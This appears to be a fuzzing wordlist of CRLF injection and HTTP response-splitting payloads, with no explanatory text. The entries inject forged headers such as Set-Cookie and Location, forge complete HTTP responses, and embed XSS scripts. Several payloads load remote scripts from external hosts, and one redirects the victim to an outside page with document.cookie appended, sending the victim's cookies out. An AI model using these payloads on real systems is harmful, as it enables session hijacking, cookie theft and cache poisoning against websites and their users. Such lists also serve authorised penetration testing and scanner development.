%0a
%0d
%0a%0d
%0atest
%0dtest
%0D
%0A
%0D%0A
%0d%0a
%0D%0a
%250a
%250a%250d
%25%30%44%a
%25%30%64%a
%25%30%41%a
%25%30%61%a
%0a%0dtest
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
%0a%20
%0aSet-Cookie%3AINJECT%3DINJECTXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%3B%0aLocation%3Ahttp%3A%2F%2Fxerosecurity.com%2F.testing%2Fiframe_injection.php%0a%0a
%0d%0aSet-Cookie%3AINJECT%3DINJECTXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%3B%0d%0aLocation%3Ahttp%3A%2F%2Fxerosecurity.com%2F.testing%2Fiframe_injection.php%0d%0a%0d%0a
%0d%0aSet-Cookie: INJECTX=INJECTXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX;
%0aSet-Cookie: INJECTX=INJECTXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX;
%0aContent-Length%3A%200%0a%0aHTTP%2F1.1%20200%20OK%0aContent-Type%3A%20text%2Fhtml%0aLast-Modified%3A%20Fri%2C%2030%20Apr%202099%2011%3A11%3A18%20GMT%0aContent-Length%3A%2048%0a%3Chtml%3E%3Cscript%3Edocument.cookie()%3B%3C%2Fscript%3E%3C%2Fhtml%3E
%0aContent-Length%3A%200%0a%0aHTTP%2F1.1%20200%20OK%0aContent-Type%3A%20text%2Fhtml%0aLocation%3A%20http%3A%2F%2Fcrowdshield.com%0aContent-Length%3A%20122%0a%3Chtml%3E%3CBODY%20ONLOAD%3Dalert('XSS')%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E%3CIFRAME%20SRC%3D%22javascript%3Aalert('XSS')%3B%22%3E%3C%2FIFRAME%3E%3C%2Fbody%3E%3C%2Fhtml%3E
%0aContent-Length%3A%200%0a%0aHTTP%2F1.1%20200%20OK%0aDate%3A%20Fri%2C%2006%20Mar%202016%2000%3A07%3A47%20GMT%0aContent-Type%3A%20text%2Fhtml%3Bcharset%3DISO-8859-1%0aContent-Length%3A%2040%0a%3Chtml%3E%3Cbody%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E
%0aContent-Length%3A%200%0a%0aHTTP%2F1.1%20200%20OK%0aDate%3A%20Fri%2C%2006%20Mar%202016%2000%3A07%3A47%20GMT%0aContent-Type%3A%20text%2Fhtml%3Bcharset%3DUTF-8%0aContent-Length%3A%2052%0a%3Chtml%3E%3Cbody%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E%3C%2Fbody%3E%3C%2Fhtml%3E
%0aContent-Length%3A%200%0a%0aHTTP%2F1.1%20200%20OK%0aDate%3A%20Fri%2C%2006%20Mar%202016%2000%3A07%3A47%20GMT%0aContent-Type%3A%20text%2Fhtml%3Bcharset%3DUTF-8%0aContent-Length%3A%20769%0a%3Chtml%3E%3Cbody%3E%3Cscript%20src%3D%22http%3A%2F%2Fxerosecurity.com%2F.testing%2Fxss.js%3Fscript_src%3D1%22%3E%3C%2Fscript%3E%0a%3Cimg%20src%3D%22http%3A%2F%2Fxerosecurity.com%2F.testing%2Fxss.jpg%3Fimg_src%3D1%22%3E%3C%2Fimg%3E%0a%3Ciframe%20src%3D%22http%3A%2F%2Fxerosecurity.com%2F.testing%2Fiframe_injection.php%3Fiframe_src%3D1%22%20height%3D%220%22%20width%3D%220%22%3E%3C%2Fiframe%3E%0a%3Ciframe%20src%3D%22http%3A%2F%2Fxerosecurity.com%2F.testing%2Fiframe_injection.php%3Fiframe_src%3D1%22%20height%3D%22100%25%22%20width%3D%22100%25%22%3E%3C%2Fiframe%3E%0a%3Cimg%20src%3D%22http%3A%2F%2Fxerosecurity.com%2F.testing%2Fxss.jpg%3Fimg_src_onerror_prompt%22%20onerror%3Dprompt(%22http%3A%2F%2Fxerosecurity.com%2F.testing%2Fxss.js%22)%3B%3E%0a%3Cimg%20src%3D%22http%3A%2F%2Fxerosecurity.com%2F.testing%2Fxss.jpg%3Fimg_src_onerror_prompt%22%20onerror%3Dwindow.location(%22http%3A%2F%2Fxerosecurity.com%2F.testing%2Fxss.html%22)%3B%3E%0a%3Cscript%3Elocation.href%3D'http%3A%2F%2Fxerosecurity.com%2F.testing%2Fiframe_injection.php%3F'%2Bdocument.cookie%3B%3C%2Fscript%3E%3C%2Fbody%3E%3C%2Fhtml%3E
%0aContent-Length%3A%200%0a%0aHTTP%2F1.1%20200%20OK%0aDate%3A%20Fri%2C%2006%20Mar%202016%2000%3A07%3A47%20GMT%0aLast-Modified%3A%20Fri%2C%2006%20Mar%202017%2000%3A07%3A47%20GMT%0aContent-Type%3A%20text%2Fhtml%3Bcharset%3DISO-8859-1%0aContent-Length%3A%2040%0a%3Chtml%3E%3Cbody%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E
//crowdshield.com%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%20222%0d%0a<script>alert%28%27INJECTX%27%29<%2fscript>%0d%0a%0d%0a
%0d%0d%0d%0d%0d%0d%0d%0d%0d%0d%0d%0dINJECTX%0d%0d%0d%0d%0d%0d%0d%0d%0d%0d%0d%0d%0d%0d
%0a%0a%0a%0a%0a%0a%%0a%0a%0a%0a%0a%0aINJECTX%0a%0a%0a%0a%0a%0a%0a%0a%0a%0a%0a%0a%0a%0a
%0d%0a%20
https://crowdshield.com/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20Set-Coookie%3AINJECTX%3DINJECTX
%0d%0aContent-Length:%200%0d%0d%0a%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0d%0a%0a<html>Hacked</html>
%0d%0aContent-Length%3A%200%0d%0d%0a%0aHTTP%2F1.1%20200%20OK%0d%0aContent-Type%3A%20text%2Fhtml%0d%0aLast-Modified%3A%20Fri%2C%2030%20Apr%202099%2011%3A11%3A18%20GMT%0d%0aContent-Length%3A%2048%0d%0a%3Chtml%3E%3Cscript%3Edocument.cookie()%3B%3C%2Fscript%3E%3C%2Fhtml%3E
%0d%0aContent-Length%3A%200%0d%0d%0a%0aHTTP%2F1.1%20200%20OK%0d%0aDate%3A%20Fri%2C%2006%20Mar%202016%2000%3A07%3A47%20GMT%0d%0aContent-Type%3A%20text%2Fhtml%3Bcharset%3DISO-8859-1%0d%0aContent-Length%3A%2040%0d%0a%3Chtml%3E%3Cbody%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E
%0d%0aContent-Length%3A%200%0d%0d%0a%0aHTTP%2F1.1%20200%20OK%0d%0aDate%3A%20Fri%2C%2006%20Mar%202016%2000%3A07%3A47%20GMT%0d%0aContent-Type%3A%20text%2Fhtml%3Bcharset%3DUTF-8%0d%0aContent-Length%3A%2052%0d%0a%3Chtml%3E%3Cbody%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E%3C%2Fbody%3E%3C%2Fhtml%3E
%0d%0aContent-Length%3A%200%0d%0d%0a%0aHTTP%2F1.1%20200%20OK%0d%0aDate%3A%20Fri%2C%2006%20Mar%202016%2000%3A07%3A47%20GMT%0d%0aContent-Type%3A%20text%2Fhtml%3Bcharset%3DUTF-8%0d%0aContent-Length%3A%20769%0d%0a%3Chtml%3E%3Cbody%3E%3Cscript%20src%3D%22http%3A%2F%2Fxerosecurity.com%2F.testing%2Fxss.js%3Fscript_src%3D1%22%3E%3C%2Fscript%3E%0d%0a%3Cimg%20src%3D%22http%3A%2F%2Fxerosecurity.com%2F.testing%2Fxss.jpg%3Fimg_src%3D1%22%3E%3C%2Fimg%3E%0d%0a%3Ciframe%20src%3D%22http%3A%2F%2Fxerosecurity.com%2F.testing%2Fiframe_injection.php%3Fiframe_src%3D1%22%20height%3D%220%22%20width%3D%220%22%3E%3C%2Fiframe%3E%0d%0a%3Ciframe%20src%3D%22http%3A%2F%2Fxerosecurity.com%2F.testing%2Fiframe_injection.php%3Fiframe_src%3D1%22%20height%3D%22100%25%22%20width%3D%22100%25%22%3E%3C%2Fiframe%3E%0d%0a%3Cimg%20src%3D%22http%3A%2F%2Fxerosecurity.com%2F.testing%2Fxss.jpg%3Fimg_src_onerror_prompt%22%20onerror%3Dprompt(%22http%3A%2F%2Fxerosecurity.com%2F.testing%2Fxss.js%22)%3B%3E%0d%0a%3Cimg%20src%3D%22http%3A%2F%2Fxerosecurity.com%2F.testing%2Fxss.jpg%3Fimg_src_onerror_prompt%22%20onerror%3Dwindow.location(%22http%3A%2F%2Fxerosecurity.com%2F.testing%2Fxss.html%22)%3B%3E%0d%0a%3Cscript%3Elocation.href%3D'http%3A%2F%2Fxerosecurity.com%2F.testing%2Fiframe_injection.php%3F'%2Bdocument.cookie%3B%3C%2Fscript%3E%3C%2Fbody%3E%3C%2Fhtml%3E
%0d%0aReferer:%20https://crowdshield.com/INJECTXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
%0d%20
%0dContent-Length:%200%0d%0dHTTP/1.1%20200%20OK%0dContent-Type:%20text/html%0dContent-Length:%2019%0d%0d<html>Hacked</html>
200%20OK%0aCookie%3A%20%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E%0aContent-Type%3A%20text%2Fhtml%0a%0a%3Chtml%3E%0a%3Cscript%3Ealert(2)%3B%3C%2Fscript%3E%0a%3C%2Fhtml%3E%3C!--%0a%0a
200%20OK%0d%0aCookie%3A%20%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E%0d%0aContent-Type%3A%20text%2Fhtml%0d%0d%0a%0a%3Chtml%3E%0d%0a%3Cscript%3Ealert(2)%3B%3C%2Fscript%3E%0d%0a%3C%2Fhtml%3E%3C!--%0d%0d%0a%0a
%0aSet-Cookie:%20INJECTX=INJECTX;%0a
%20%0a
%20%0a%20
%20%0d
%20%0d%0a
%20%0d%0a%20
%20%0d%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20Set-Cookie%3AINJECTXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
%20%250a
%20%250a%250d
%250a%20
%250a%250d%20
%25%30%44%25%30%41%a
%25%32%30%25%30%64%25%30%61%a
%2F%2crowdshield.com%0aContent-Type%3Atext%2Fhtml%0aContent-Length%0a222%0a%3Cscript%3Ealert('XSSPOSED')%3C%2Fscript%22%3E
%2F%2Fcrowdshield.com%0d%0aContent-Type%3Atext%2Fhtml%0d%0aContent-Length%0d%0a222%0d%0a%3Cscript%3Ealert('XSSPOSED')%3C%2Fscript%22%3E
%5c%72%5c%6e
%5C%72%5C%6E
%5cr%5cn
%5CR%5CN
INJECTX%0dXTest%3AINJECTX
INJECTX%250aXTest%3AINJECTX
%e5%98%8a
%e5%98%8A
%E5%98%8a
%E5%98%8A
en%0aContent-Length%3A%200%0a%0aHTTP%2F1.1%20200%20OK%0aContent-Type%3A%20text%2Fhtml%0aContent-Length%3A%2048%0a%3Chtml%3E%3Cscript%3Edocument.cookie()%3B%3C%2Fscript%3E%3C%2Fhtml%3E
en%0aContent-Length%3A%200%0a%0aHTTP%2F1.1%20200%20OK%0aContent-Type%3A%20text%2Fhtml%0aLast-Modified%3A%20Fri%2C%2030%20Apr%202099%2011%3A11%3A18%20GMT%0aContent-Length%3A%2048%0a%3Chtml%3E%3Cscript%3Edocument.cookie()%3B%3C%2Fscript%3E%3C%2Fhtml%3E
en%0aContent-Length%3A%200%0a%0aHTTP%2F1.1%20200%20OK%0aContent-Type%3A%20text%2Fhtml%0aLocation%3A%20http%3A%2F%2Fcrowdshield.com%0aContent-Length%3A%20122%0a%3Chtml%3E%3CBODY%20ONLOAD%3Dalert('XSS')%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E%3CIFRAME%20SRC%3D%22javascript%3Aalert('XSS')%3B%22%3E%3C%2FIFRAME%3E%3C%2Fbody%3E%3C%2Fhtml%3E
en%0aContent-Length%3A%200%0a%0aHTTP%2F1.1%20200%20OK%0aDate%3A%20Fri%2C%2006%20Mar%202016%2000%3A07%3A47%20GMT%0aContent-Type%3A%20text%2Fhtml%3Bcharset%3DISO-8859-1%0aContent-Length%3A%2040%0a%3Chtml%3E%3Cbody%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E
en%0aContent-Length%3A%200%0a%0aHTTP%2F1.1%20200%20OK%0aDate%3A%20Fri%2C%2006%20Mar%202016%2000%3A07%3A47%20GMT%0aLast-Modified%3A%20Fri%2C%2006%20Mar%202017%2000%3A07%3A47%20GMT%0aContent-Type%3A%20text%2Fhtml%3Bcharset%3DISO-8859-1%0aContent-Length%3A%2040%0a%3Chtml%3E%3Cbody%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E
en%0d%0aContent-Length%3A%200%0d%0d%0a%0aHTTP%2F1.1%20200%20OK%0d%0aDate%3A%20Fri%2C%2006%20Mar%202016%2000%3A07%3A47%20GMT%0d%0aContent-Type%3A%20text%2Fhtml%3Bcharset%3DISO-8859-1%0d%0aContent-Length%3A%2040%0d%0a%3Chtml%3E%3Cbody%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E
en%250AContent-Length%253A%25200%250A%250AHTTP%252F1.1%2520200%2520OK%250AContent-Type%253A%2520text%252Fhtml%250AContent-Length%253A%252048%250A%253Chtml%253E%253Cscript%253Edocument.cookie%28%29%253B%253C%252Fscript%253E%253C%252Fhtml%253E
foobar%0d%0aCONTENT-LENGTH:%200%0d%0d%0a%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aCONTENT-LENGTH:%2025%0d%0d%0a%0a<html>Hacked</html>
foobar%0dCONTENT-LENGTH:%200%0d%0dHTTP/1.1%20200%20OK%0dContent-Type:%20text/html%0dCONTENT-LENGTH:%2025%0d%0d<html>Hacked</html>
foobar%20%0d%0aContent-Length%3A%200%20%0d%0aHTTP%2F1.1%20200%20OK%20%0d%0aContent-Type%3A%20text%2Fhtml%20%0d%0aLast-Modified%3A%20Mon%2C%2027%20Oct%202016%2014%3A50%3A18%20GMT%20%0d%0aContent-Length%3A%2045%20%0d%0aHacked%0d%0a
foobar%20%0dContent-Length%3A%200%20%0dHTTP%2F1.1%20200%20OK%20%0dContent-Type%3A%20text%2Fhtml%20%0dLast-Modified%3A%20Mon%2C%2027%20Oct%202016%2014%3A50%3A18%20GMT%20%0dContent-Length%3A%2045%20%0dHacked%0d
###General Vectors###
HTTP/1.1+200+OK%0aContent-Type:+text/html%0aContent-Length:+132%0aContent-Encoding:+deflate%0a%0aD0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUUwCiudIbEAtwwwEt33sGDttwGDDDGG03sDGGwGGtDtt33333sG03333sDDdFPcOKwGWoSsgkwoemUcMOKwGWoS4
HTTP/1.1+200+OK%0d%0aContent-Type:+text/html%0d%0aContent-Length:+132%0d%0aContent-Encoding:+deflate%0d%0d%0a%0aD0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUUwCiudIbEAtwwwEt33sGDttwGDDDGG03sDGGwGGtDtt33333sG03333sDDdFPcOKwGWoSsgkwoemUcMOKwGWoS4
%0dSet-Cookie: INJECTX=INJECTX
%0aSet-Cookie: INJECTX=INJECTX
%0d%0a%20Set-Cookie: INJECTX=INJECTX
%0aSet-Cookie: INJECTX=INJECTX%0aX:INJECTX
%0dSet-Cookie: INJECTX=INJECTX%0aX:INJECTX
%0d%0aSet-Cookie: INJECTX=x%0aX:INJECTX
%0d%0a%20Set-Cookie: x=x%0aX:INJECTX
%E5%98%8A%E5%98%8DSet-Cookie: INJECTX=INJECTX
//www.xerosecurity.com/%2E%2E%0aSet-Cookie: INJECTX=INJECTX
//www.xerosecurity.com/%2E%2E%0d%0a%20Set-Cookie: INJECTX=INJECTX
//www.xerosecurity.com/%2E%2E%0dSet-Cookie: INJECTX=INJECTX
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++set-Cookie: INJECTXXXXXXXXXX;
INJECTX%0aSet-Cookie%3AINJECT%3DINJECTXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%3B%0aLocation%3Ahttp%3A%2F%2Fxerosecurity.com%2F.testing%2Fiframe_injection.php%0a%0a
INJECTX%0aSet-Cookie: INJECT=INJECTXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX;
INJECTX%0d%0aSet-Cookie%3AINJECT%3DINJECTXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%3B%0d%0aLocation%3Ahttp%3A%2F%2Fxerosecurity.com%2F.testing%2Fiframe_injection.php%0d%0d%0a%0a
%E5%98%8A%E5%98%8DSet-Cookie: %20INJECTX
%E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%29%E5%98%BE
/test/%2e%2e/tr
//////www.xerosecurity.com/%2e%2e/tr
%2fwww.xerosecurity.com%2f%2e%2e/tr
/%0aSet-Cookie: INJECTX%0aX:/%2e%2e/tr
%2Fxxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a%3cscript%3ealert(INJECTX)%3c/script%3e%2F..%2F..%2F..%2F../
<h1\>INJECTX</h1\>
foo%00%0d%0abar
foo%250d%250abar
foo%%0d0d%%0a0abar
%0d%0a%20Set-Cookie: x=x%0aX:INJECTX/%%0a0aSet-Cookie:crlf=injection
/%0aSet-Cookie:crlf=injection
/%0d%0aSet-Cookie:crlf=injection
/%0dSet-Cookie:crlf=injection
/%23%0aSet-Cookie:crlf=injection
/%23%0d%0aSet-Cookie:crlf=injection
/%23%0dSet-Cookie:crlf=injection
/%25%30%61Set-Cookie:crlf=injection
/%25%30aSet-Cookie:crlf=injection
/%250aSet-Cookie:crlf=injection
/%25250aSet-Cookie:crlf=injection
/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection
/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection
/%2F..%0d%0aSet-Cookie:crlf=injection
/%3f%0d%0aSet-Cookie:crlf=injection
/%3f%0dSet-Cookie:crlf=injection
/%u000aSet-Cookie:crlf=injection
/%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
/%0d%0aheader:header
/%0aheader:header
/%0dheader:header
/%23%0dheader:header
/%3f%0dheader:header
/%250aheader:header
/%25250aheader:header
/%%0a0aheader:header
/%25%30aheader:header
/%25%30%61header:header
/%u000aheader:header
%0d%0a%0d%0a
r%0d%0aContentLength:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContentType:%20text/html%0d%0aContentLength:%2019%0d%0a%0d%0a<html>Injected%02Content</html>
%0d%0d%0a%0a
0x0D0x0A
0x0D0x0D0x0A0x0A
\r\n
%0%0d%0ad%0%0d%0aa
%0%0D%0AD%0%0D%0AA
%0d%0aContentType:%20text/html;charset=UTF-7%0d%0aContent-Length:%20129%0d%0a%0d%0a%2BADw-html%2BAD4-%2BADw-body%2BAD4-%2BADw-script%2BAD4-alert%28%27XSS,cookies:%27%2Bdocument.cookie%29%2BADw-/script%2BAD4-%2BADw-/body%2BAD4-%2BADw-/html%2BAD4
%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com
%0d%0a%0d%0a%3Chtml%3E%3Cbody%3E%3C%2Fbody%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fs.js%3E%3C%2Fscript%3E%3Cscript%3Ealert(%22location.host%20is:%20%22%2Blocation.host)%3C%2Fscript%3E%3C%2Fhtml%3E
%0d%0a%0d%0a%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2Fscript%3E
%22%3E%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C%22
%0AContent-type:%20text/html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
%0d%0a%0d%0a%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E
%0AHeader-Test:HacktivistRO
%0A%20Header-Test:HacktivistRO
%20%0AHeader-Test:HacktivistRO
%23%OAHeader-Test:HacktivistRO
%E5%98%8A%E5%98%8DHeader-Test:HacktivistRO
%E5%98%8A%E5%98%8D%0AHeader-Test:HacktivistRO
%3F%0AHeader-Test:HacktivistRO
